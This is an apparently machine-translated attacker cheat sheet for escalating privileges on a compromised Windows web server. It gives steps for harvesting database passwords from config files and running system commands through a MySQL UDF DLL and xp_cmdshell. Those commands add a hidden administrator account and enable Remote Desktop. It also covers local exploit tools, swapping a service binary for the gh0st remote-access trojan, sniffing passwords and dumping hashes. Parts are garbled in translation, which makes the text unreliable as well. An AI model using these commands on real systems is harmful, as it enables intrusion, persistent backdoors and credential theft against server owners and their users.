1. Search for the configuration file and view the config. asp config. php conn. asp Inc directory under the website directory to find the account and password with high permissions.
For example, the root password SA password.
// [CH] modify the following variables based on the account parameters provided by the Space Provider. If you have any questions, contact the server provider.
$ Dbhost = 'localhost ';
// Database Server
$ Dbuser = 'root ';
// Database username
$ Dbpw = '000000 ';
// Database Password
$ Dbname = 'discuz ';
// Database Name
$ Pconnect = 0;
// Database persistent connection 0 = closed, 1 = hit
Get the root account password:
Root
123
Privilege Escalation using MySQL Root
DLL has been successfully exported to c: \ windows \ system32 \ mysqldll_1269695183.dll
Function 'state' already exists
Select state ("net user yhsafe/Add ")
Successful SQL statement execution: Resource ID #2
Array
(
[0] => the command is successfully completed.
Succeed!
[State ("net user yhsafe/Add")] => the command is successfully completed.
Succeed!
)
Use SA to escalate Permissions
Server = localhost; uid = SAWD = 123; database = masterrovider = sqloledb
If xp_cmdshell is not executed, remember to restore xp_cmdshell first.
Exec master. DBO. xp_mongoshell 'net user yhsafe.com yhsafe/add'
Exec master. DBO. xp_mongoshell 'net localgroup administrators yhsafe.com/add'
Enable 3389:
Exec master. DBO. xp_mongoshell 'C: \ Inetpub \ wwwroot \ BBS \ 3389.exe 3389'
Returned results:
Now opening terminate service... Success!
5.2
OK...
Enabled successfully
2. Escalate permissions by exploiting software configuration vulnerabilities or local overflow.
"Brazilian barbecue" Elevation of Privilege:
Run ch.exe "net user 123 123/Add" in webshell"
360 Elevation of Privilege:
360. EXE 3389 // The Remote Desktop is enabled.
Press shift under 5 to pop up cmd
3. replacement service method
C: \ FTP \ ftpserver.exe
Rename ftpserver.exe to ftpserver1.exe
Upload a remote control program for bounce. For example, gh0st
Gh0st is renamed ftpserver.exe
4. Use webshell for sniffer
Ftp http passwords that can be sniffer to the entire server.
Wireshark professional tools are required to view passwords.
5. Dump Password
Dump requires administrator or even system Permissions
Dump out the hash to further penetrate the Intranet